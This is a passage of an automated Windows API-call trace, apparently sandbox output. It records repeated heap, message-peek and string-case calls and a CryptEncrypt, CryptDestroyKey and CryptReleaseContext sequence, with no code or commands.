out: hHeap=0x25c0000) returned 1 [0195.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.973] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.973] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.973] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.973] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.973] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0195.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.974] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.974] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.974] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.974] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.974] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0195.975] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.975] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0195.975] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.975] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0195.975] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.975] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.975] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.975] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.976] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.976] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.976] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.977] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.977] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x8aa4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8aa8) returned 1 [0195.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.977] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.977] CharLowerBuffW (in: lpsz="byte[35496]", cchLength=0xb | out: lpsz="byte[35496]") returned 0xb [0195.978] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.980] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.980] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.980] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.980] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.980] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.981] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x8aa4, dwBufLen=0x8aa8 | out: pbData=0x34b2250*, pdwDataLen=0x8bef68*=0x8aa8) returned 1 [0195.981] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.981] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.981] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.981] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.982] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.983] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.983] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.983] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.983] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.983] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.983] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0195.983] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.983] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.983] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.984] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.984] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.984] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0195.984] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.984] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0195.984] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.988] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.988] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.988] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.992] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.992] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0195.992] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.992] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0195.992] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.992] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.992] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.992] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.992] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.992] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.992] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0195.993] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.993] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0195.993] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.993] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.993] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.993] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.993] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.993] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.993] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.993] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.993] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.993] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.993] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.993] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.993] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0195.993] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.993] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.994] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.994] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.994] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.994] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0195.994] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.994] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0195.994] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.994] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.994] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0195.994] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.994] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0195.995] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.995] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0195.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.995] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0195.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.995] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.995] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.995] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.995] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.995] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.995] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.995] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.996] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.996] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0195.996] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.996] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0195.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) 